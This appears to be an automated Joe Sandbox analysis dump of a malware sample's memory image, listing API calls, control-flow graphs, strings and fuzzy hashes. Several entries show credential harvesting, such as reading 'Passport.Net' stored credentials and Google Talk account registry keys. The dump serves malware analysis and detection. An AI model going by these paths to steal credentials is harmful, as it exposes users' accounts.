                                                      control_flow_graph 347 4034e4-403544 memset * 2 call 410b1e 350 403580-403582 347->350 351 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 347->351 351->350
                                                      APIs
                                                      • memset.MSVCRT ref: 00403504
                                                      • memset.MSVCRT ref: 0040351A
                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                      • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                      • _mbscat.MSVCRT ref: 0040356D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _mbscatmemset$Close_mbscpystrlen
                                                      • String ID: InstallPath$Software\Group Mail$fb.dat
                                                      • API String ID: 3071782539-966475738
                                                      • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                      • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                      • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                      • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 356 40f6e2-40f70a call 40466b call 4045db 361 40f710-40f717 call 404734 356->361 362 40f7e9-40f801 call 404656 call 404785 356->362 361->362 367 40f71d-40f72e CredReadA 361->367 367->362 369 40f734-40f73a 367->369 371 40f740-40f743 369->371 372 40f7e5 369->372 371->372 373 40f749-40f759 371->373 372->362 374 40f75a-40f770 373->374 374->374 375 40f772-40f795 call 4047a5 374->375 378 40f7e2 375->378 379 40f797-40f7b6 WideCharToMultiByte 375->379 378->372 380 40f7b8-40f7c6 strlen 379->380 381 40f7d9-40f7dc LocalFree 379->381 380->381 382 40f7c8-40f7d8 _mbscpy 380->382 381->378 382->381
                                                      APIs
                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                      • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                      • strlen.MSVCRT ref: 0040F7BE
                                                      • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                                      • String ID: Passport.Net\*
                                                      • API String ID: 4000595657-3671122194
                                                      • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                      • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                      • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                      • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 383 40ccd7-40cd06 ??2@YAPAXI@Z 384 40cd08-40cd0d 383->384 385 40cd0f 383->385 386 40cd11-40cd24 ??2@YAPAXI@Z 384->386 385->386 387 40cd26-40cd2d call 404025 386->387 388 40cd2f 386->388 389 40cd31-40cd57 387->389 388->389 391 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 389->391 392 40cd59-40cd60 DeleteObject 389->392 392->391
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                      • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                      • DeleteObject.GDI32(?), ref: 0040CD5A
                                                      • memset.MSVCRT ref: 0040CD96
                                                      • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                      • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                      • String ID:
                                                      • API String ID: 2054149589-0
                                                      • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                      • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                      • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                      • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 400 44b40e-44b415 GetModuleHandleA 401 44b455 400->401 402 44b417-44b426 call 44b42b 400->402 404 44b457-44b45b 401->404 411 44b48d 402->411 412 44b428-44b433 GetProcAddress 402->412 406 44b45d-44b465 GetModuleHandleA 404->406 407 44b49a call 44b49f 404->407 410 44b467-44b46f 406->410 410->410 413 44b471-44b474 410->413 415 44b48e-44b496 411->415 412->401 416 44b435-44b442 VirtualProtect 412->416 413->404 414 44b476-44b478 413->414 417 44b47e-44b486 414->417 418 44b47a-44b47c 414->418 424 44b498 415->424 420 44b454 416->420 421 44b444-44b452 VirtualProtect 416->421 422 44b487-44b488 GetProcAddress 417->422 418->422 420->401 421->420 422->411 424->413
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                        • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                        • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                        • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                      • String ID:
                                                      • API String ID: 2099061454-0
                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                      • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                      • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                      • memset.MSVCRT ref: 00408620
                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                      • memset.MSVCRT ref: 00408671
                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                      • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                      Strings
                                                      • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                      • String ID: Software\Google\Google Talk\Accounts
                                                      • API String ID: 1366857005-1079885057
                                                      • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                      • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                      • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                      • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 448 40ba28-40ba3a 449 40ba87-40ba9b call 406c62 448->449 450 40ba3c-40ba52 call 407e20 _mbsicmp 448->450 472 40ba9d call 4107f1 449->472 473 40ba9d call 404734 449->473 474 40ba9d call 404785 449->474 475 40ba9d call 403c16 449->475 476 40ba9d call 410a9c 449->476 455 40ba54-40ba6d call 407e20 450->455 456 40ba7b-40ba85 450->456 462 40ba74 455->462 463 40ba6f-40ba72 455->463 456->449 456->450 457 40baa0-40bab3 call 407e30 465 40bab5-40bac1 457->465 466 40bafa-40bb09 SetCursor 457->466 464 40ba75-40ba76 call 40b5e5 462->464 463->464 464->456 468 40bac3-40bace 465->468 469 40bad8-40baf7 qsort 465->469 468->469 469->466 472->457 473->457 474->457 475->457 476->457
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Cursor_mbsicmpqsort
                                                      • String ID: /nosort$/sort
                                                      • API String ID: 882979914-1578091866
                                                      • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                      • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                      • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                      • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                        • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                        • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                        • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                        • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                      • String ID:
                                                      • API String ID: 2099061454-0
                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                      • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                      • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                      APIs
                                                      • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProcProtectVirtual$HandleModule
                                                      • String ID:
                                                      • API String ID: 2152742572-0
                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                      • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                      • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                      APIs
                                                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,75570A60,?,00000000), ref: 00410D1C
                                                        • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                      • memset.MSVCRT ref: 00410E10
                                                      • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                      • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                      Strings
                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                      • API String ID: 889583718-2036018995
                                                      • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                      • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                      • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                      • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                      APIs
                                                      • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                      • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindLoadLockSizeof
                                                      • String ID:
                                                      • API String ID: 3473537107-0
                                                      • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                      • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                      • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                      • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                      APIs
                                                      • memset.MSVCRT ref: 004109F7
                                                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                        • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                      • memset.MSVCRT ref: 00410A32
                                                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                      • String ID:
                                                      • API String ID: 3143880245-0
                                                      • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                      • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                      • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                      • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                      APIs
                                                      • malloc.MSVCRT ref: 00406F4C
                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,`Wu,00407A43,00000001,?,00000000,`Wu,00407DBD,00000000,?,?), ref: 00406F64
                                                      • free.MSVCRT ref: 00406F6D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: freemallocmemcpy
                                                      • String ID: `Wu
                                                      • API String ID: 3056473165-3261129705
                                                      • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                      • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                      • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                      • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??3@
                                                      • String ID:
                                                      • API String ID: 613200358-0
                                                      • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                      • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                      • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                      • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D5C
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D7A
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D98
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408DA8
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??2@
                                                      • String ID:
                                                      • API String ID: 1033339047-0
                                                      • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                      • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                      • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                      • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                      APIs
                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                      • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CreateFontIndirect_mbscpymemset
                                                      • String ID: Arial
                                                      • API String ID: 3853255127-493054409
                                                      • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                      • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                      • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                      • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                      APIs
                                                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                      • _strcmpi.MSVCRT ref: 0040CEC3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: strlen$_strcmpimemset
                                                      • String ID: /stext
                                                      • API String ID: 520177685-3817206916
                                                      • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                      • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
